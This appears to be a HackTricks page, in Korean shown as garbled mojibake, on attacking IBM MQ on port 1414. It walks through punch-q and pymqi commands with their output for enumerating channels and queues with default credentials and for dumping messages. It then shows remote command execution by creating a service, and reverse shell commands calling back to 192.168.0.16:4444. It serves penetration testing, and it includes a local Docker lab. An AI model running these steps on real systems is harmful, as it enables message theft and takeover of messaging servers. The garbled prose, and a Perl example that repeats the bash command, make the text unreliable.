1414 - Pentesting IBM MQ

Tip

AWS ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°:HackTricks Training AWS Red Team Expert (ARTE)
GCP ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training GCP Red Team Expert (GRTE) Azure ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks μ§€μ›ν•˜κΈ°

κΈ°λ³Έ 정보

IBM MQλŠ” λ©”μ‹œμ§€ 큐λ₯Ό κ΄€λ¦¬ν•˜κΈ° μœ„ν•œ IBM κΈ°μˆ μž…λ‹ˆλ‹€. λ‹€λ₯Έ λ©”μ‹œμ§€ 브둜컀 기술과 λ§ˆμ°¬κ°€μ§€λ‘œ, μƒμ‚°μžμ™€ μ†ŒλΉ„μž κ°„μ˜ 정보λ₯Ό μˆ˜μ‹ , μ €μž₯, 처리 및 λΆ„λ₯˜ν•˜λŠ” 데 μ „λ…ν•˜κ³  μžˆμŠ΅λ‹ˆλ‹€.

기본적으둜, IBM MQλŠ” TCP 포트 1414λ₯Ό λ…ΈμΆœν•©λ‹ˆλ‹€. λ•Œλ•Œλ‘œ, HTTP REST APIλŠ” 포트 9443μ—μ„œ λ…ΈμΆœλ  수 μžˆμŠ΅λ‹ˆλ‹€. λ©”νŠΈλ¦­(ν”„λ‘¬ν…Œμš°μŠ€)은 TCP 포트 9157μ—μ„œ μ ‘κ·Όν•  수 μžˆμŠ΅λ‹ˆλ‹€.

IBM MQ TCP 포트 1414λŠ” λ©”μ‹œμ§€, 큐, 채널 등을 μ‘°μž‘ν•˜λŠ” 데 μ‚¬μš©λ  수 μžˆμ§€λ§Œ, μΈμŠ€ν„΄μŠ€λ₯Ό μ œμ–΄ν•˜λŠ” 데도 μ‚¬μš©λ  수 μžˆμŠ΅λ‹ˆλ‹€.

IBM은 https://www.ibm.com/docs/en/ibm-mqμ—μ„œ μ‚¬μš©ν•  수 μžˆλŠ” λ°©λŒ€ν•œ 기술 λ¬Έμ„œλ₯Ό μ œκ³΅ν•©λ‹ˆλ‹€.

도ꡬ

μ‰¬μš΄ μ΅μŠ€ν”Œλ‘œμž‡μ„ μœ„ν•œ μΆ”μ²œ λ„κ΅¬λŠ” **punch-q**둜, Dockerλ₯Ό μ‚¬μš©ν•©λ‹ˆλ‹€. 이 λ„κ΅¬λŠ” Python 라이브러리 pymqiλ₯Ό 적극적으둜 μ‚¬μš©ν•©λ‹ˆλ‹€.

보닀 μˆ˜λ™μ μΈ μ ‘κ·Ό 방식을 μ›ν•œλ‹€λ©΄, Python 라이브러리 **pymqi**λ₯Ό μ‚¬μš©ν•˜μ„Έμš”. IBM MQ 쒅속성이 ν•„μš”ν•©λ‹ˆλ‹€.

pymqi μ„€μΉ˜

IBM MQ 쒅속성을 μ„€μΉ˜ν•˜κ³  λ‘œλ“œν•΄μ•Ό ν•©λ‹ˆλ‹€:

  1. https://login.ibm.com/μ—μ„œ 계정(IBMid)을 μƒμ„±ν•©λ‹ˆλ‹€.
  2. https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fcμ—μ„œ IBM MQ 라이브러리λ₯Ό λ‹€μš΄λ‘œλ“œν•©λ‹ˆλ‹€. Linux x86_64의 경우 9.0.0.4-IBM-MQC-LinuxX64.tar.gzμž…λ‹ˆλ‹€.
  3. 압좕을 ν’‰λ‹ˆλ‹€ (tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz).
  4. sudo ./mqlicense.shλ₯Ό μ‹€ν–‰ν•˜μ—¬ λΌμ΄μ„ΌμŠ€ 쑰건에 λ™μ˜ν•©λ‹ˆλ‹€.

Kali Linuxλ₯Ό μ‚¬μš©ν•˜λŠ” 경우, 파일 mqlicense.shλ₯Ό μˆ˜μ •ν•©λ‹ˆλ‹€: λ‹€μŒ 쀄(105-110ν–‰ 사이)을 제거/주석 μ²˜λ¦¬ν•©λ‹ˆλ‹€:

if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
then
  echo "ERROR: This package is incompatible with this system"
  echo "       This package was built for ${BUILD_PLATFORM}"
  exit 1
fi
  1. λ‹€μŒ νŒ¨ν‚€μ§€λ₯Ό μ„€μΉ˜ν•©λ‹ˆλ‹€:
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
  1. 그런 λ‹€μŒ, .so νŒŒμΌμ„ LD에 μž„μ‹œλ‘œ μΆ”κ°€ν•©λ‹ˆλ‹€: export LD_LIBRARY_PATH=/opt/mqm/lib64, λ‹€λ₯Έ 도ꡬλ₯Ό μ΄λŸ¬ν•œ 쒅속성을 μ‚¬μš©ν•˜μ—¬ μ‹€ν–‰ν•˜κΈ° 전에.

그런 λ‹€μŒ, ν”„λ‘œμ νŠΈ pymqiλ₯Ό 클둠할 수 μžˆμŠ΅λ‹ˆλ‹€: ν₯미둜운 μ½”λ“œ μŠ€λ‹ˆνŽ«, μƒμˆ˜ 등이 ν¬ν•¨λ˜μ–΄ μžˆμŠ΅λ‹ˆλ‹€. λ˜λŠ” 라이브러리λ₯Ό 직접 μ„€μΉ˜ν•  수 μžˆμŠ΅λ‹ˆλ‹€: pip install pymqi.

Using punch-q

With Docker

κ°„λ‹¨νžˆ μ‚¬μš©ν•˜μ„Έμš”: sudo docker run --rm -ti leonjza/punch-q.

Without Docker

ν”„λ‘œμ νŠΈ punch-qλ₯Ό ν΄λ‘ ν•œ λ‹€μŒ, μ„€μΉ˜λ₯Ό μœ„ν•΄ readmeλ₯Ό λ”°λ₯΄μ„Έμš” (pip install -r requirements.txt && python3 setup.py install).

κ·Έ ν›„, punch-q λͺ…λ ΉμœΌλ‘œ μ‚¬μš©ν•  수 μžˆμŠ΅λ‹ˆλ‹€.

Enumeration

punch-q λ˜λŠ” pymqiλ₯Ό μ‚¬μš©ν•˜μ—¬ 큐 κ΄€λ¦¬μž 이름, μ‚¬μš©μž, 채널 및 큐λ₯Ό μ—΄κ±°ν•΄ λ³Ό 수 μžˆμŠ΅λ‹ˆλ‹€.

Queue Manager

λ•Œλ•Œλ‘œ, 큐 κ΄€λ¦¬μž 이름을 μ–»λŠ” 것에 λŒ€ν•œ λ³΄ν˜Έκ°€ μ—†μŠ΅λ‹ˆλ‹€:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
Queue Manager name: MYQUEUEMGR

Channels

punch-qλŠ” κΈ°μ‘΄ 채널을 μ°ΎκΈ° μœ„ν•΄ λ‚΄λΆ€(μˆ˜μ • κ°€λŠ₯ν•œ) 단어 λͺ©λ‘μ„ μ‚¬μš©ν•©λ‹ˆλ‹€. μ‚¬μš© 예:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
"DEV.ADMIN.SVRCONN" exists and was authorised.
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.

일뢀 IBM MQ μΈμŠ€ν„΄μŠ€λŠ” μΈμ¦λ˜μ§€ μ•Šμ€ MQ μš”μ²­μ„ ν—ˆμš©ν•˜λ―€λ‘œ --username / --passwordκ°€ ν•„μš”ν•˜μ§€ μ•ŠμŠ΅λ‹ˆλ‹€. λ¬Όλ‘ , μ ‘κ·Ό κΆŒν•œμ€ λ‹€λ₯Ό 수 μžˆμŠ΅λ‹ˆλ‹€.

ν•˜λ‚˜μ˜ 채널 이름(μ—¬κΈ°μ„œλŠ” DEV.ADMIN.SVRCONN)을 μ–»μœΌλ©΄, λ‹€λ₯Έ λͺ¨λ“  채널을 μ—΄κ±°ν•  수 μžˆμŠ΅λ‹ˆλ‹€.

μ—΄κ±°λŠ” 기본적으둜 pymqi의 이 μ½”λ“œ μŠ€λ‹ˆνŽ« code/examples/dis_channels.py둜 μˆ˜ν–‰ν•  수 μžˆμŠ΅λ‹ˆλ‹€:

import logging
import pymqi

logging.basicConfig(level=logging.INFO)

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

prefix = '*'

args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
response = pcf.MQCMD_INQUIRE_CHANNEL(args)
except pymqi.MQMIError as e:
if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
logging.info('No channels matched prefix `%s`' % prefix)
else:
raise
else:
for channel_info in response:
channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
logging.info('Found channel `%s`' % channel_name)

qmgr.disconnect()

… ν•˜μ§€λ§Œ punch-qλŠ” κ·Έ 뢀뢄도 ν¬ν•¨ν•˜κ³  μžˆμŠ΅λ‹ˆλ‹€ (더 λ§Žμ€ 정보와 ν•¨κ»˜!). λ‹€μŒκ³Ό 같이 μ‹€ν–‰ν•  수 μžˆμŠ΅λ‹ˆλ‹€:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
Showing channels with prefix: "*"...

| Name                 | Type              | MCA UID | Conn Name | Xmit Queue | Description     | SSL Cipher |
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
| DEV.ADMIN.SVRCONN    | Server-connection |         |           |            |                 |            |
| DEV.APP.SVRCONN      | Server-connection | app     |           |            |                 |            |
| SYSTEM.AUTO.RECEIVER | Receiver          |         |           |            | Auto-defined by |            |
| SYSTEM.AUTO.SVRCONN  | Server-connection |         |           |            | Auto-defined by |            |
| SYSTEM.DEF.AMQP      | AMQP              |         |           |            |                 |            |
| SYSTEM.DEF.CLUSRCVR  | Cluster-receiver  |         |           |            |                 |            |
| SYSTEM.DEF.CLUSSDR   | Cluster-sender    |         |           |            |                 |            |
| SYSTEM.DEF.RECEIVER  | Receiver          |         |           |            |                 |            |
| SYSTEM.DEF.REQUESTER | Requester         |         |           |            |                 |            |
| SYSTEM.DEF.SENDER    | Sender            |         |           |            |                 |            |
| SYSTEM.DEF.SERVER    | Server            |         |           |            |                 |            |
| SYSTEM.DEF.SVRCONN   | Server-connection |         |           |            |                 |            |
| SYSTEM.DEF.CLNTCONN  | Client-connection |         |           |            |                 |            |

Queues

pymqi (dis_queues.py)와 ν•¨κ»˜ μ½”λ“œ μŠ€λ‹ˆνŽ«μ΄ μžˆμ§€λ§Œ punch-qλŠ” 큐에 λŒ€ν•œ 더 λ§Žμ€ 정보λ₯Ό 검색할 수 있게 ν•΄μ€λ‹ˆλ‹€:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
Showing queues with prefix: "*"...
| Created   | Name                 | Type   | Usage   | Depth  | Rmt. QM | Rmt. Qu | Description                       |
|           |                      |        |         |        | GR Name | eue Nam |                                   |
|           |                      |        |         |        |         | e       |                                   |
|-----------|----------------------|--------|---------|--------|---------|---------|-----------------------------------|
| 2023-10-1 | DEV.DEAD.LETTER.QUEU | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 | E                    |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
| 2023-10-1 | DEV.QUEUE.1          | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 |                      |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
| 2023-10-1 | DEV.QUEUE.2          | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 |                      |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
| 2023-10-1 | DEV.QUEUE.3          | Local  | Normal  | 0      |         |         |                                   |
| 0 18.35.1 |                      |        |         |        |         |         |                                   |
| 9         |                      |        |         |        |         |         |                                   |
# Truncated

Exploit

Dump messages

큐(λ“€)/채널(λ“€)을 λŒ€μƒμœΌλ‘œ ν•˜μ—¬ λ©”μ‹œμ§€λ₯Ό μŠ€λ‹ˆν•‘ν•˜κ±°λ‚˜ 덀프할 수 μžˆμŠ΅λ‹ˆλ‹€(λΉ„νŒŒκ΄΄μ  μž‘μ—…). μ˜ˆμ‹œ:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump

λͺ¨λ“  μ‹λ³„λœ 큐에 λŒ€ν•΄ λ°˜λ³΅ν•˜λŠ” 것을 μ£Όμ €ν•˜μ§€ λ§ˆμ‹­μ‹œμ˜€.

μ½”λ“œ μ‹€ν–‰

κ³„μ†ν•˜κΈ° 전에 λͺ‡ 가지 세뢀정보: IBM MQλŠ” μ—¬λŸ¬ λ°©λ²•μœΌλ‘œ μ œμ–΄ν•  수 μžˆμŠ΅λ‹ˆλ‹€: MQSC, PCF, Control Command. 일반적인 λͺ©λ‘μ€ IBM MQ λ¬Έμ„œμ—μ„œ 찾을 수 μžˆμŠ΅λ‹ˆλ‹€. PCF (ν”„λ‘œκ·Έλž˜λ¨ΈλΈ” μ»€λ§¨λ“œ 포맷)은 μΈμŠ€ν„΄μŠ€μ™€ μ›κ²©μœΌλ‘œ μƒν˜Έμž‘μš©ν•˜κΈ° μœ„ν•΄ μš°λ¦¬κ°€ μ§‘μ€‘ν•˜λŠ” κ²ƒμž…λ‹ˆλ‹€. punch-q와 λ”λΆˆμ–΄ pymqiλŠ” PCF μƒν˜Έμž‘μš©μ„ 기반으둜 ν•©λ‹ˆλ‹€.

PCF λͺ…λ Ή λͺ©λ‘μ„ 찾을 수 μžˆμŠ΅λ‹ˆλ‹€:

ν₯미둜운 λͺ…λ Ή 쀑 ν•˜λ‚˜λŠ” MQCMD_CREATE_SERVICE이며, κ·Έ λ¬Έμ„œλŠ” μ—¬κΈ°μ—μ„œ 확인할 수 μžˆμŠ΅λ‹ˆλ‹€. 이 λͺ…령은 μΈμŠ€ν„΄μŠ€μ˜ 둜컬 ν”„λ‘œκ·Έλž¨μ„ κ°€λ¦¬ν‚€λŠ” StartCommandλ₯Ό 인수둜 μ‚¬μš©ν•©λ‹ˆλ‹€ (예: /bin/sh).

λ¬Έμ„œμ—λŠ” 이 λͺ…령에 λŒ€ν•œ 경고도 μžˆμŠ΅λ‹ˆλ‹€: β€œμ£Όμ˜: 이 λͺ…령은 μ‚¬μš©μžκ°€ mqm κΆŒν•œμœΌλ‘œ μž„μ˜μ˜ λͺ…령을 μ‹€ν–‰ν•  수 μžˆλ„λ‘ ν—ˆμš©ν•©λ‹ˆλ‹€. 이 λͺ…령을 μ‚¬μš©ν•  κΆŒν•œμ΄ λΆ€μ—¬λ˜λ©΄, μ•…μ˜μ μ΄κ±°λ‚˜ λΆ€μ£Όμ˜ν•œ μ‚¬μš©μžκ°€ μ‹œμŠ€ν…œμ΄λ‚˜ 데이터λ₯Ό μ†μƒμ‹œν‚€λŠ” μ„œλΉ„μŠ€λ₯Ό μ •μ˜ν•  수 μžˆμŠ΅λ‹ˆλ‹€. 예λ₯Ό λ“€μ–΄, ν•„μˆ˜ νŒŒμΌμ„ μ‚­μ œν•˜λŠ” κ²ƒμž…λ‹ˆλ‹€.”

μ°Έκ³ : 항상 IBM MQ λ¬Έμ„œ(관리 μ°Έμ‘°)에 λ”°λ₯΄λ©΄, μ„œλΉ„μŠ€ 생성을 μœ„ν•œ λ™λ“±ν•œ MQSC λͺ…λ Ή(DEFINE SERVICE)을 μ‹€ν–‰ν•˜κΈ° μœ„ν•΄ /admin/action/qmgr/{qmgrName}/mqsc에 HTTP μ—”λ“œν¬μΈνŠΈλ„ μžˆμŠ΅λ‹ˆλ‹€. 이 츑면은 아직 μ—¬κΈ°μ—μ„œ 닀루어지지 μ•Šμ•˜μŠ΅λ‹ˆλ‹€.

원격 ν”„λ‘œκ·Έλž¨ 싀행을 μœ„ν•œ PCFλ₯Ό μ‚¬μš©ν•œ μ„œλΉ„μŠ€ 생성/μ‚­μ œλŠ” punch-q둜 μˆ˜ν–‰ν•  수 μžˆμŠ΅λ‹ˆλ‹€:

예제 1

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"

IBM MQ의 λ‘œκ·Έμ—μ„œ λͺ…령이 μ„±κ³΅μ μœΌλ‘œ μ‹€ν–‰λ˜μ—ˆλ‹€κ³  읽을 수 μžˆμŠ΅λ‹ˆλ‹€:

2023-10-10T19:13:01.713Z AMQ5030I: The Command '808544aa7fc94c48' has started. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]

κΈ°κ³„μ—μ„œ κΈ°μ‘΄ ν”„λ‘œκ·Έλž¨μ„ λ‚˜μ—΄ν•  μˆ˜λ„ μžˆμŠ΅λ‹ˆλ‹€ (μ—¬κΈ°μ„œ /bin/doesnotexist … μ‘΄μž¬ν•˜μ§€ μ•ŠμŠ΅λ‹ˆλ‹€):

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
s "whatever"
Command: /bin/doesnotexist
Arguments: -c id
Service Name: 6e3ef5af652b4436

Creating service...
Starting service...
The program '/bin/doesnotexist' is not available on the remote system.
Giving the service 0 second(s) to live...
Cleaning up service...
Done

ν”„λ‘œκ·Έλž¨ 싀행이 λΉ„λ™κΈ°μ μ΄λΌλŠ” 점에 μœ μ˜ν•˜μ„Έμš”. λ”°λΌμ„œ μ΅μŠ€ν”Œλ‘œμž‡μ„ ν™œμš©ν•˜κΈ° μœ„ν•΄ 두 번째 ν•­λͺ©μ΄ ν•„μš”ν•©λ‹ˆλ‹€ (λ¦¬λ²„μŠ€ μ…Έ λ¦¬μŠ€λ„ˆ, λ‹€λ₯Έ μ„œλΉ„μŠ€μ—μ„œ 파일 생성, λ„€νŠΈμ›Œν¬λ₯Ό ν†΅ν•œ 데이터 유좜 …)

예제 2

μ‰¬μš΄ λ¦¬λ²„μŠ€ 셸을 μœ„ν•΄, punch-qλŠ” 두 가지 λ¦¬λ²„μŠ€ μ…Έ νŽ˜μ΄λ‘œλ“œλ₯Ό μ œμ•ˆν•©λ‹ˆλ‹€:

  • ν•˜λ‚˜λŠ” bash
  • ν•˜λ‚˜λŠ” perl

λ¬Όλ‘  execute λͺ…λ Ήμ–΄λ‘œ μ‚¬μš©μž μ •μ˜ νŽ˜μ΄λ‘œλ“œλ₯Ό λ§Œλ“€ 수 μžˆμŠ΅λ‹ˆλ‹€.

bash의 경우:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444

Perl에 λŒ€ν•΄:

❯ sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444

Custom PCF

IBM MQ λ¬Έμ„œλ₯Ό μžμ„Ένžˆ μ‚΄νŽ΄λ³΄κ³  pymqi 파이썬 라이브러리λ₯Ό μ‚¬μš©ν•˜μ—¬ punch-q에 κ΅¬ν˜„λ˜μ§€ μ•Šμ€ νŠΉμ • PCF λͺ…령을 ν…ŒμŠ€νŠΈν•  수 μžˆμŠ΅λ‹ˆλ‹€.

Example:

import pymqi

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
# Replace here with your custom PCF args and command
# The constants can be found in pymqi/code/pymqi/CMQCFC.py
args = {pymqi.CMQCFC.xxxxx: "value"}
response = pcf.MQCMD_CUSTOM_COMMAND(args)
except pymqi.MQMIError as e:
print("Error")
else:
# Process response

qmgr.disconnect()

μƒμˆ˜ 이름을 찾을 수 μ—†λŠ” 경우, IBM MQ λ¬Έμ„œλ₯Ό μ°Έμ‘°ν•  수 μžˆμŠ΅λ‹ˆλ‹€.

_MQCMD_REFRESH_CLUSTER의 예 (μ‹­μ§„μˆ˜ = 73). λ§€κ°œλ³€μˆ˜ MQCA_CLUSTER_NAME (μ‹­μ§„μˆ˜ = 2029)이 ν•„μš”ν•˜λ©°, μ΄λŠ” _일 수 μžˆμŠ΅λ‹ˆλ‹€ (λ¬Έμ„œ: ):*

import pymqi

queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'

qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)

try:
   args = {2029: "*"}
   response = pcf.MQCMD_REFRESH_CLUSTER(args)
except pymqi.MQMIError as e:
   print("Error")
else:
   print(response)

qmgr.disconnect()

ν…ŒμŠ€νŠΈ ν™˜κ²½

IBM MQ의 λ™μž‘ 및 μ΅μŠ€ν”Œλ‘œμž‡μ„ ν…ŒμŠ€νŠΈν•˜λ €λ©΄ Dockerλ₯Ό 기반으둜 ν•œ 둜컬 ν™˜κ²½μ„ μ„€μ •ν•  수 μžˆμŠ΅λ‹ˆλ‹€:

  1. ibm.com 및 cloud.ibm.com에 계정이 μžˆμ–΄μ•Ό ν•©λ‹ˆλ‹€.
  2. λ‹€μŒμ„ μ‚¬μš©ν•˜μ—¬ μ»¨ν…Œμ΄λ„ˆν™”λœ IBM MQλ₯Ό μƒμ„±ν•©λ‹ˆλ‹€:
sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2

기본적으둜 인증이 ν™œμ„±ν™”λ˜μ–΄ 있으며, μ‚¬μš©μž 이름은 admin이고 λΉ„λ°€λ²ˆν˜ΈλŠ” passw0rdμž…λ‹ˆλ‹€ (ν™˜κ²½ λ³€μˆ˜ MQ_ADMIN_PASSWORD). μ—¬κΈ°μ„œ 큐 κ΄€λ¦¬μž 이름은 MYQUEUEMGR둜 μ„€μ •λ˜μ–΄ μžˆμŠ΅λ‹ˆλ‹€ (λ³€μˆ˜ MQ_QMGR_NAME).

IBM MQκ°€ μ‹€ν–‰ 쀑이며 ν¬νŠΈκ°€ λ…ΈμΆœλ˜μ–΄ μžˆμ–΄μ•Ό ν•©λ‹ˆλ‹€:

❯ sudo docker ps
CONTAINER ID   IMAGE                                COMMAND                  CREATED         STATUS                    PORTS                                                                    NAMES
58ead165e2fd   icr.io/ibm-messaging/mq:9.3.2.0-r2   "runmqdevserver"         3 seconds ago   Up 3 seconds              0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp   testing-ibmmq

IBM MQ 도컀 μ΄λ―Έμ§€μ˜ 이전 버전은 λ‹€μŒμ— μžˆμŠ΅λ‹ˆλ‹€: https://hub.docker.com/r/ibmcom/mq/.

References

Tip

AWS ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°:HackTricks Training AWS Red Team Expert (ARTE)
GCP ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training GCP Red Team Expert (GRTE) Azure ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks μ§€μ›ν•˜κΈ°